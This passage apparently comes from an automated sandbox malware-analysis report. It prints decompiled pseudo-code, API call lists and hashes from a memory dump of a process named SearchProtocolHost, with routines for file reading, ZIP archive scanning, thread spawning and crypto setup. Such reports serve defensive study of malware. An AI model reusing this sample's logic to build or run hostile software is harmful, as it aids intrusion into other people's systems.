                                                				 *_t24 = 0; // executed
                                                				_t12 = CreateFileA(__ecx, 0x80000000, 1, 0, 3, 0x80, 0); // executed
                                                				_v8 = _t12;
                                                				if(_t12 != 0xffffffff) {
                                                					_push(_t19);
                                                					_push(_t27);
                                                					_t13 = SetFilePointer(_t12, 0, 0, 1); // executed
                                                					__eflags = _t13 - 0xffffffff;
                                                					_t20 = _t19 & 0xffffff00 | __eflags != 0x00000000;
                                                					_t28 = E02FB0A6E(_t27, __eflags, 0x20);
                                                					_t15 = _v8;
                                                					 *_t28 = 1;
                                                					 *((char*)(_t28 + 0x10)) = 1;
                                                					 *(_t28 + 1) = _t20;
                                                					 *(_t28 + 4) = _t15;
                                                					 *((char*)(_t28 + 8)) = 0;
                                                					 *(_t28 + 0xc) = 0;
                                                					__eflags = _t20;
                                                					if(_t20 != 0) {
                                                						_t17 = SetFilePointer(_t15, 0, 0, 1); // executed
                                                						 *(_t28 + 0xc) = _t17;
                                                					}
                                                					 *_t24 = 0;
                                                					return _t28;
                                                				} else {
                                                					 *_t24 = 0x200;
                                                					return 0;
                                                				}
                                                			}















                                                APIs
                                                • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,00000140,?,?,02FAF440,00000141,FFFFFFFF,?,02FAFFE1,?), ref: 02FAE0F1
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000001,00000000,00000001,?,02FAF440,00000141,FFFFFFFF,?,02FAFFE1,?,?,00000244,93AD1EEA), ref: 02FAE115
                                                • new.LIBCMT ref: 02FAE123
                                                • SetFilePointer.KERNELBASE(FFFFFFFF,00000000,00000000,00000001), ref: 02FAE153
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: File$Pointer$Create
                                                • String ID:
                                                • API String ID: 250661774-0
                                                • Opcode ID: 08cf81a296f78e8fe80da8815385f9365788f3fa93ebe5cacd015834da67d455
                                                • Instruction ID: 4660cee58e2a91d4cfbf0e435b8332ec0948d99627f84dd257d55844020fdaad
                                                • Opcode Fuzzy Hash: 08cf81a296f78e8fe80da8815385f9365788f3fa93ebe5cacd015834da67d455
                                                • Instruction Fuzzy Hash: F211C871684305BBF7308F68DC0AB86FBD89B01760F204659F655AB3C0D7F575508754
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FAB470() {
                                                				void* _v8;
                                                
                                                				 *0x2fd6a48 = 0;
                                                				L1:
                                                				if( *0x2fd6a48 < 0x40) {
                                                					_v8 = 0;
                                                					if(E02FAB660( &_v8) != 1) {
                                                						CreateThread(0, 0, E02FAB3C0, _v8, 0, 0); // executed
                                                						Sleep(0xa); // executed
                                                					} else {
                                                						Sleep(0x1e); // executed
                                                					}
                                                				} else {
                                                					Sleep(0x12c);
                                                				}
                                                				goto L1;
                                                			}





                                                APIs
                                                • Sleep.KERNEL32(0000012C), ref: 02FAB49E
                                                • Sleep.KERNELBASE(0000001E), ref: 02FAB4B8
                                                • CreateThread.KERNELBASE(00000000,00000000,02FAB3C0,00000000,00000000,00000000), ref: 02FAB4CC
                                                • Sleep.KERNELBASE(0000000A), ref: 02FAB4D0
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Sleep$CreateThread
                                                • String ID:
                                                • API String ID: 3220764680-0
                                                • Opcode ID: 87a6c49fbaae4d8d19a13349be0c0bf972bfb754d7973d6c941e61b2effe6d88
                                                • Instruction ID: 4f9982b8ef48148891cab10ff9c0f632096f544cfa668d9ff00c901b0b788a54
                                                • Opcode Fuzzy Hash: 87a6c49fbaae4d8d19a13349be0c0bf972bfb754d7973d6c941e61b2effe6d88
                                                • Instruction Fuzzy Hash: E5F0E2B5EC030CFBE6109FE0DE11F0CBA28AB25B98F604004EB04AA2C082F078408FA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FAE170(char* __ecx, long __edx, LONG* _a4) {
                                                				LONG* _t13;
                                                				LONG* _t19;
                                                
                                                				if( *__ecx == 0) {
                                                					_t13 = _a4;
                                                					if(_t13 != 0) {
                                                						if(_t13 != 1) {
                                                							if(_t13 == 2) {
                                                								 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x18)) + __edx;
                                                							}
                                                							return 0;
                                                						} else {
                                                							 *((intOrPtr*)(__ecx + 0x1c)) =  *((intOrPtr*)(__ecx + 0x1c)) + __edx;
                                                							return 0;
                                                						}
                                                					} else {
                                                						 *((intOrPtr*)(__ecx + 0x1c)) = __edx;
                                                						return _t13;
                                                					}
                                                				} else {
                                                					if( *((char*)(__ecx + 1)) == 0) {
                                                						return 0x1d;
                                                					} else {
                                                						_t19 = _a4;
                                                						if(_t19 != 0) {
                                                							if(_t19 != 1) {
                                                								if(_t19 != 2) {
                                                									return 0x13;
                                                								} else {
                                                									SetFilePointer( *(__ecx + 4), __edx, 0, _t19); // executed
                                                									return 0;
                                                								}
                                                							} else {
                                                								SetFilePointer( *(__ecx + 4), __edx, 0, _t19);
                                                								return 0;
                                                							}
                                                						} else {
                                                							SetFilePointer( *(__ecx + 4),  *((intOrPtr*)(__ecx + 0xc)) + __edx, _t19, _t19); // executed
                                                							return 0;
                                                						}
                                                					}
                                                				}
                                                			}






                                                APIs
                                                • SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE190
                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE1A6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: d0be27af45ae7ebd75df9b0e949a4b4594ccc641f627206d754a318808fc8fe9
                                                • Instruction ID: 21f28a2635ce217612ec7065c0bed203590a21b95f840a9960cd79fc5bfd217c
                                                • Opcode Fuzzy Hash: d0be27af45ae7ebd75df9b0e949a4b4594ccc641f627206d754a318808fc8fe9
                                                • Instruction Fuzzy Hash: 551165B1A441146FFB14CF64EC55B35379DDB8535CF3488B5F50CCA551E323D8569A40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E02FAE3C0(char* __ecx, void* __eflags) {
                                                				intOrPtr _v8;
                                                				intOrPtr _v12;
                                                				intOrPtr _v16;
                                                				signed int _v20;
                                                				long _v24;
                                                				long _v28;
                                                				intOrPtr _v32;
                                                				signed int _t46;
                                                				signed int _t48;
                                                				intOrPtr _t49;
                                                				long _t54;
                                                				struct _OVERLAPPED* _t55;
                                                				signed int _t58;
                                                				void* _t60;
                                                				intOrPtr _t61;
                                                				int _t63;
                                                				long _t65;
                                                				intOrPtr* _t67;
                                                				intOrPtr _t69;
                                                				intOrPtr _t78;
                                                				intOrPtr _t80;
                                                				intOrPtr _t84;
                                                				long _t87;
                                                				void* _t91;
                                                				void* _t94;
                                                				void* _t95;
                                                				void* _t96;
                                                
                                                				_t68 = __ecx;
                                                				_t67 = __ecx; // executed
                                                				_t46 = E02FAE170(__ecx, 0, 2); // executed
                                                				_t95 = _t94 + 4;
                                                				if(_t46 == 0) {
                                                					if( *__ecx == 0) {
                                                						_t84 =  *((intOrPtr*)(__ecx + 0x1c));
                                                						goto L7;
                                                					} else {
                                                						if( *((char*)(__ecx + 1)) == 0) {
                                                							_t84 = 0;
                                                							_v16 = 0;
                                                							goto L8;
                                                						} else {
                                                							_t65 = SetFilePointer( *(__ecx + 4), 0, 0, 1); // executed
                                                							_t84 = _t65 -  *((intOrPtr*)(_t67 + 0xc));
                                                							L7:
                                                							_v16 = _t84;
                                                							_v12 = 0xffff;
                                                							if(_t84 < 0xffff) {
                                                								L8:
                                                								_v12 = _t84;
                                                							}
                                                						}
                                                					}
                                                					_push(0x404);
                                                					_t48 = E02FB5A3B(_t68);
                                                					_t91 = _t48;
                                                					_t96 = _t95 + 4;
                                                					if(_t91 != 0) {
                                                						_t69 = _v12;
                                                						_t49 = 4;
                                                						_v8 = 0xffffffff;
                                                						if(_t69 > 4) {
                                                							while(1) {
                                                								_t78 =  >  ? _t69 : _t49 + 0x400;
                                                								_t54 = _t84 - _t78;
                                                								_v32 = _t78;
                                                								_v28 = _t54;
                                                								_t87 =  >  ? 0x404 : _t84 - _t54;
                                                								_t55 = E02FAE170(_t67, _t54, 0); // executed
                                                								_t96 = _t96 + 4;
                                                								if(_t55 != 0) {
                                                									goto L31;
                                                								}
                                                								_t72 = _t87;
                                                								_v20 = _t87;
                                                								if( *_t67 == _t55) {
                                                									_t80 =  *((intOrPtr*)(_t67 + 0x1c));
                                                									if(_t80 + _t87 >  *((intOrPtr*)(_t67 + 0x18))) {
                                                										_t72 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
                                                										_v20 =  *((intOrPtr*)(_t67 + 0x18)) - _t80;
                                                									}
                                                									E02FC3DB0(_t91,  *((intOrPtr*)(_t67 + 0x14)) + _t80, _t72);
                                                									_t58 = _v20;
                                                									_t96 = _t96 + 0xc;
                                                									 *((intOrPtr*)(_t67 + 0x1c)) =  *((intOrPtr*)(_t67 + 0x1c)) + _t58;
                                                								} else {
                                                									_t63 = ReadFile( *(_t67 + 4), _t91, _t87,  &_v24, _t55); // executed
                                                									if(_t63 == 0) {
                                                										 *((char*)(_t67 + 8)) = 1;
                                                									}
                                                									_t58 = _v24;
                                                								}
                                                								if(_t58 / _t87 == 1) {
                                                									_t60 = _t87 - 3;
                                                									if(_t60 < 0) {
                                                										L28:
                                                										_t61 = _v8;
                                                									} else {
                                                										while(1) {
                                                											_t60 = _t60 - 1;
                                                											if( *((char*)(_t60 + _t91)) == 0x50 &&  *((char*)(_t60 + _t91 + 1)) == 0x4b &&  *((char*)(_t60 + _t91 + 2)) == 5 &&  *((char*)(_t60 + _t91 + 3)) == 6) {
                                                												break;
                                                											}
                                                											if(_t60 >= 0) {
                                                												continue;
                                                											} else {
                                                												goto L28;
                                                											}
                                                											goto L29;
                                                										}
                                                										_t61 = _t60 + _v28;
                                                										_v8 = _t61;
                                                									}
                                                									L29:
                                                									if(_t61 == 0) {
                                                										_t69 = _v12;
                                                										_t49 = _v32;
                                                										_t84 = _v16;
                                                										if(_t49 < _t69) {
                                                											continue;
                                                										}
                                                									}
                                                								}
                                                								goto L31;
                                                							}
                                                						}
                                                						L31:
                                                						L02FB5A36(_t91);
                                                						return _v8;
                                                					} else {
                                                						return _t48 | 0xffffffff;
                                                					}
                                                				} else {
                                                					return _t46 | 0xffffffff;
                                                				}
                                                			}































                                                APIs
                                                  • Part of subcall function 02FAE170: SetFilePointer.KERNELBASE(?,?,00000002,00000002,?,02FAE3D2,00000002,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE190
                                                • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001,00000000,00000001,?,?,?,02FAE570,?,00000000,00000001), ref: 02FAE3F6
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 54eb87cd58436f838b0f231177af3f4da81acb2e762dc4f954ee75acbbca4ba9
                                                • Instruction ID: 1f6527889eb9da327cd4be614ba641cd92a03691515f783c6cc80918da87a357
                                                • Opcode Fuzzy Hash: 54eb87cd58436f838b0f231177af3f4da81acb2e762dc4f954ee75acbbca4ba9
                                                • Instruction Fuzzy Hash: 5E41F2F1F002059FEF24CE69DD9476EBBAA9F85394F1481B9DA09DB382E730D9518B40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 74%
                                                			E02FAFF70(void* __eflags) {
                                                				intOrPtr _v8;
                                                				char _v16;
                                                				intOrPtr* _v20;
                                                				void* __ecx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t12;
                                                				intOrPtr _t16;
                                                				intOrPtr* _t17;
                                                				void* _t20;
                                                				intOrPtr* _t28;
                                                				signed int _t35;
                                                
                                                				_push(0xffffffff);
                                                				_push(E02FC47B2);
                                                				_push( *[fs:0x0]);
                                                				_push(_t20);
                                                				_t12 =  *0x2fcf008; // 0x93ad1eea
                                                				_push(_t12 ^ _t35);
                                                				 *[fs:0x0] =  &_v16;
                                                				_t32 = _t20;
                                                				_t28 = E02FB0A6E(_t20, __eflags, 0x244);
                                                				_v20 = _t28;
                                                				_push(_t20);
                                                				_t21 = _t28;
                                                				 *_t28 = 0;
                                                				 *((intOrPtr*)(_t28 + 4)) = 0xffffffff;
                                                				 *((intOrPtr*)(_t28 + 0x134)) = 0xffffffff;
                                                				 *((intOrPtr*)(_t28 + 0x138)) = 0;
                                                				 *((intOrPtr*)(_t28 + 0x13c)) = 0;
                                                				_v8 = 0xffffffff;
                                                				_t16 = E02FAF3D0(_t28, _t28, _t32); // executed
                                                				 *0x2fd6a4c = _t16;
                                                				if(_t16 == 0) {
                                                					_t17 = E02FB0A6E(_t32, __eflags, 8);
                                                					 *_t17 = 1;
                                                					 *((intOrPtr*)(_t17 + 4)) = _t28;
                                                					 *[fs:0x0] = _v16;
                                                					return _t17;
                                                				} else {
                                                					E02FB0030(_t28, _t21);
                                                					 *[fs:0x0] = _v16;
                                                					return 0;
                                                				}
                                                			}
















                                                APIs
                                                • new.LIBCMT ref: 02FAFF9C
                                                  • Part of subcall function 02FAF3D0: GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,02FAFFE1,?,?,00000244,93AD1EEA,?,?,?,93AD1EEA,02FC47B2), ref: 02FAF3F7
                                                • new.LIBCMT ref: 02FB0007
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                • Opcode ID: 928349ecd67a06653e6f2464e6509988faff85068aab747dcbbba5254ed062be
                                                • Instruction ID: e57ea509fd4e7bd22619b44e878733213d2fb05b78932e8ceded46629392369d
                                                • Opcode Fuzzy Hash: 928349ecd67a06653e6f2464e6509988faff85068aab747dcbbba5254ed062be
                                                • Instruction Fuzzy Hash: 8F11CEB2A04605AFD314DF19DC05B9AFBE9FB45B70F00432EE829877C0EBB564008B90
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FB7848(void* _a4) {
                                                				char _t3;
                                                				intOrPtr* _t4;
                                                				intOrPtr _t6;
                                                
                                                				if(_a4 != 0) {
                                                					_t3 = RtlFreeHeap( *0x2fd67f4, 0, _a4); // executed
                                                					if(_t3 == 0) {
                                                						_t4 = E02FB5D43();
                                                						_t6 = E02FB5CCA(GetLastError());
                                                						 *_t4 = _t6;
                                                						return _t6;
                                                					}
                                                				}
                                                				return _t3;
                                                			}







                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,02FBC333,?,00000000,?,00000000,?,02FBC35A,?,00000007,?,?,02FBC757,?), ref: 02FB785E
                                                • GetLastError.KERNEL32(?,?,02FBC333,?,00000000,?,00000000,?,02FBC35A,?,00000007,?,?,02FBC757,?,?), ref: 02FB7870
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 485612231-0
                                                • Opcode ID: 3895e1706e40475feea44b24d7347c87b723c65367305b7ea5f3d2cd1ca97497
                                                • Instruction ID: dedb02bc0b2d0ea04e0c1984989f93b9c9194ae898591b5767b140647d51479f
                                                • Opcode Fuzzy Hash: 3895e1706e40475feea44b24d7347c87b723c65367305b7ea5f3d2cd1ca97497
                                                • Instruction Fuzzy Hash: 8FE08632944209A7CB162FB5AD0CFD9BB99AF407D1F600524F74CD6150DB349490CBC4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 37%
                                                			E02FA48B0(intOrPtr* __ecx) {
                                                				void* _t8;
                                                				void* _t11;
                                                				void* _t18;
                                                				intOrPtr* _t19;
                                                
                                                				_t19 = __ecx;
                                                				_t15 =  *((intOrPtr*)( *__ecx + 0xc)) + 0x50;
                                                				_t8 = LocalAlloc(0x40,  *((intOrPtr*)( *__ecx + 0xc)) + 0x50); // executed
                                                				_t20 =  *_t19;
                                                				_t18 = _t8;
                                                				asm("movups xmm0, [esi]");
                                                				_t2 = _t18 + 0x50; // 0x50
                                                				asm("movups [edi], xmm0");
                                                				asm("movups xmm0, [esi+0x10]");
                                                				asm("movups [edi+0x10], xmm0");
                                                				asm("movups xmm0, [esi+0x20]");
                                                				asm("movups [edi+0x20], xmm0");
                                                				asm("movups xmm0, [esi+0x30]");
                                                				asm("movups [edi+0x30], xmm0");
                                                				asm("movups xmm0, [esi+0x40]");
                                                				asm("movups [edi+0x40], xmm0");
                                                				E02FC3DB0(_t2,  *((intOrPtr*)( *_t19 + 0x50)),  *((intOrPtr*)( *_t19 + 0xc)));
                                                				_t11 = E02FA4920(_t18, _t15,  *((intOrPtr*)(_t20 + 0x54)),  *((intOrPtr*)(_t20 + 0x38))); // executed
                                                				LocalFree(_t18); // executed
                                                				return _t11;
                                                			}








                                                APIs
                                                • LocalAlloc.KERNELBASE(00000040,?,?,00000000,-00000050,02FA4BCD), ref: 02FA48C0
                                                  • Part of subcall function 02FA4920: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000050,?,?), ref: 02FA4935
                                                • LocalFree.KERNELBASE(00000000), ref: 02FA4912
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: Local$AcquireAllocContextCryptFree
                                                • String ID:
                                                • API String ID: 3426805970-0
                                                • Opcode ID: d2ce4c880d94a2b75c7db499564d3537e3ed479937a2fd29b1a8c737d3269b25
                                                • Instruction ID: 8e2cbd0f9bca88a95f6b31ea09d2c12f456350448e6293ea8beb14072e1fe3ce
                                                • Opcode Fuzzy Hash: d2ce4c880d94a2b75c7db499564d3537e3ed479937a2fd29b1a8c737d3269b25
                                                • Instruction Fuzzy Hash: 8F015271D04B45ABE3114F38CE419F2F3B4FF6D318704AB09EAC562912E761B5E48750
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E02FAE280(char* __ecx, long __edx) {
                                                				void _v5;
                                                				long _v12;
                                                				signed int _t22;
                                                				signed int* _t28;
                                                				intOrPtr _t29;
                                                				intOrPtr _t31;
                                                				char* _t35;
                                                
                                                				_t35 = __ecx;
                                                				_t28 = __edx;
                                                				_v12 = __edx;
                                                				_t33 = 1;
                                                				if( *__ecx == 0) {
                                                					_t29 =  *((intOrPtr*)(__ecx + 0x1c));
                                                					_t31 =  *((intOrPtr*)(__ecx + 0x18));
                                                					if(_t29 + 1 > _t31) {
                                                						_t33 = _t31 - _t29;
                                                					}
                                                					E02FC3DB0( &_v5,  *((intOrPtr*)(_t35 + 0x14)) + _t29, _t33);
                                                					_t22 = _t29 + _t33;
                                                					_t28 = _v12;
                                                					 *(_t35 + 0x1c) = _t22;
                                                				} else {
                                                					_t22 = ReadFile( *(__ecx + 4),  &_v5, 1,  &_v12, 0); // executed
                                                					if(_t22 == 0) {
                                                						 *((char*)(_t35 + 8)) = 1;
                                                					}
                                                					_t33 = _v12;
                                                				}
                                                				if(_t33 != 1) {
                                                					if( *_t35 == 0 ||  *((char*)(_t35 + 8)) == 0) {
                                                						goto L9;
                                                					} else {
                                                						return _t22 | 0xffffffff;
                                                					}
                                                				} else {
                                                					 *_t28 = _v5 & 0x000000ff;
                                                					L9:
                                                					return 0;
                                                				}
                                                			}











                                                APIs
                                                • ReadFile.KERNELBASE(?,?,00000001,00000000,00000000,00000000,00000000,00000001,00000000,00000001,?,?,02FAE59A,00000001), ref: 02FAE2A8
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E02FAF3D0(intOrPtr* __ecx, void* __edi, CHAR* _a4) {
                                                				char _v8;
                                                				char _t13;
                                                				intOrPtr _t14;
                                                				void* _t16;
                                                				intOrPtr _t17;
                                                				intOrPtr _t20;
                                                				short _t21;
                                                				CHAR* _t23;
                                                				char* _t29;
                                                				CHAR* _t32;
                                                				short* _t34;
                                                				intOrPtr* _t36;
                                                
                                                				_push(__ecx);
                                                				_t36 = __ecx;
                                                				if( *__ecx != 0 ||  *((intOrPtr*)(__ecx + 4)) != 0xffffffff) {
                                                					return 0x1000000;
                                                				} else {
                                                					_t2 = _t36 + 0x140; // 0x140
                                                					_t32 = _t2;
                                                					GetCurrentDirectoryA(0x104, _t32);
                                                					_t23 = _t32;
                                                					_t3 =  &(_t23[1]); // 0x141
                                                					_t29 = _t3;
                                                					do {
                                                						_t13 =  *_t23;
                                                						_t23 =  &(_t23[1]);
                                                					} while (_t13 != 0);
                                                					_t24 = _t23 - _t29;
                                                					_t14 =  *((intOrPtr*)(_t23 - _t29 + _t36 + 0x13f));
                                                					if(_t14 != 0x5c && _t14 != 0x2f) {
                                                						_t34 = _t32 - 1;
                                                						do {
                                                							_t20 =  *((intOrPtr*)(_t34 + 1));
                                                							_t34 = _t34 + 1;
                                                						} while (_t20 != 0);
                                                						_t21 = "\\"; // 0x5c
                                                						 *_t34 = _t21;
                                                					}
                                                					_t16 = E02FAE0D0(_a4, _t24,  &_v8); // executed
                                                					if(_t16 != 0) {
                                                						_t17 = E02FAE550(_t16); // executed
                                                						 *_t36 = _t17;
                                                						_t28 =  ==  ? 0x200 : 0;
                                                						_t18 =  ==  ? 0x200 : 0;
                                                						return  ==  ? 0x200 : 0;
                                                					} else {
                                                						return _v8;
                                                					}
                                                				}
                                                			}
















                                                APIs
                                                • GetCurrentDirectoryA.KERNEL32(00000104,00000140,00000000,?,00000000,?,02FAFFE1,?,?,00000244,93AD1EEA,?,?,?,93AD1EEA,02FC47B2), ref: 02FAF3F7
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: CurrentDirectory
                                                • String ID:
                                                • API String ID: 1611563598-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 92%
                                                			E02FAE200(void* __ecx, signed int __edx, long _a4, char* _a8) {
                                                				void* _v8;
                                                				int _t26;
                                                				signed int _t30;
                                                				intOrPtr _t34;
                                                				intOrPtr _t39;
                                                				char* _t45;
                                                				long _t50;
                                                
                                                				_push(__ecx);
                                                				_t45 = _a8;
                                                				_t30 = __edx;
                                                				_t50 = __edx * _a4;
                                                				_v8 = __ecx;
                                                				if( *_t45 == 0) {
                                                					_t39 =  *((intOrPtr*)(_t45 + 0x1c));
                                                					_t34 =  *((intOrPtr*)(_t45 + 0x18));
                                                					if(_t39 + _t50 > _t34) {
                                                						_t50 = _t34 - _t39;
                                                					}
                                                					E02FC3DB0(_v8,  *((intOrPtr*)(_t45 + 0x14)) + _t39, _t50);
                                                					 *((intOrPtr*)(_t45 + 0x1c)) =  *((intOrPtr*)(_t45 + 0x1c)) + _t50;
                                                					return _t50 / _t30;
                                                				} else {
                                                					_t26 = ReadFile( *(_t45 + 4), __ecx, _t50,  &_a4, 0); // executed
                                                					if(_t26 == 0) {
                                                						 *((char*)(_t45 + 8)) = 1;
                                                					}
                                                					return _a4 / _t30;
                                                				}
                                                			}











                                                APIs
                                                • ReadFile.KERNELBASE(000000FF,00000078,?,?,00000000,00000000,00000000,00000000,00000078,?,02FAEC00,00000001,00000000), ref: 02FAE227
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E02FB78D0(void* __ecx, signed int _a4, signed int _a8) {
                                                				void* _t8;
                                                				void* _t12;
                                                				signed int _t13;
                                                				void* _t15;
                                                				signed int _t18;
                                                				long _t19;
                                                
                                                				_t15 = __ecx;
                                                				_t18 = _a4;
                                                				if(_t18 == 0) {
                                                					L2:
                                                					_t19 = _t18 * _a8;
                                                					if(_t19 == 0) {
                                                						_t19 = _t19 + 1;
                                                					}
                                                					while(1) {
                                                						_t8 = RtlAllocateHeap( *0x2fd67f4, 8, _t19); // executed
                                                						if(_t8 != 0) {
                                                							break;
                                                						}
                                                						__eflags = E02FB7501();
                                                						if(__eflags == 0) {
                                                							L8:
                                                							 *((intOrPtr*)(E02FB5D43())) = 0xc;
                                                							__eflags = 0;
                                                							return 0;
                                                						}
                                                						_t12 = E02FB6248(_t15, __eflags, _t19);
                                                						_pop(_t15);
                                                						__eflags = _t12;
                                                						if(_t12 == 0) {
                                                							goto L8;
                                                						}
                                                					}
                                                					return _t8;
                                                				}
                                                				_t13 = 0xffffffe0;
                                                				if(_t13 / _t18 < _a8) {
                                                					goto L8;
                                                				}
                                                				goto L2;
                                                			}










                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,02FB91AD,00000001,00000364,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB7911
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 94%
                                                			E02FB7882(void* __ecx, long _a4) {
                                                				void* _t4;
                                                				void* _t6;
                                                				void* _t7;
                                                				long _t8;
                                                
                                                				_t7 = __ecx;
                                                				_t8 = _a4;
                                                				if(_t8 > 0xffffffe0) {
                                                					L7:
                                                					 *((intOrPtr*)(E02FB5D43())) = 0xc;
                                                					__eflags = 0;
                                                					return 0;
                                                				}
                                                				if(_t8 == 0) {
                                                					_t8 = _t8 + 1;
                                                				}
                                                				while(1) {
                                                					_t4 = RtlAllocateHeap( *0x2fd67f4, 0, _t8); // executed
                                                					if(_t4 != 0) {
                                                						break;
                                                					}
                                                					__eflags = E02FB7501();
                                                					if(__eflags == 0) {
                                                						goto L7;
                                                					}
                                                					_t6 = E02FB6248(_t7, __eflags, _t8);
                                                					_pop(_t7);
                                                					__eflags = _t6;
                                                					if(_t6 == 0) {
                                                						goto L7;
                                                					}
                                                				}
                                                				return _t4;
                                                			}








                                                APIs
                                                • RtlAllocateHeap.NTDLL(00000000,77109EB0,00000000,?,02FB0A9A,77109EB0,?,02FA9C60,00000100,?,77109EB0), ref: 02FB78B4
                                                Memory Dump Source
                                                • Source File: 00000015.00000002.723617375.0000000002FA0000.00000040.00000400.00020000.00000000.sdmp, Offset: 02FA0000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_21_2_2fa0000_SearchProtocolHost.jbxd
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 93%
                                                			E02FAE550(char* __ecx) {
                                                				intOrPtr _v8;
                                                				char _v96;
                                                				char _v100;
                                                				intOrPtr _v104;
                                                				intOrPtr _v120;
                                                				intOrPtr _v124;
                                                				intOrPtr _v128;
                                                				void _v132;
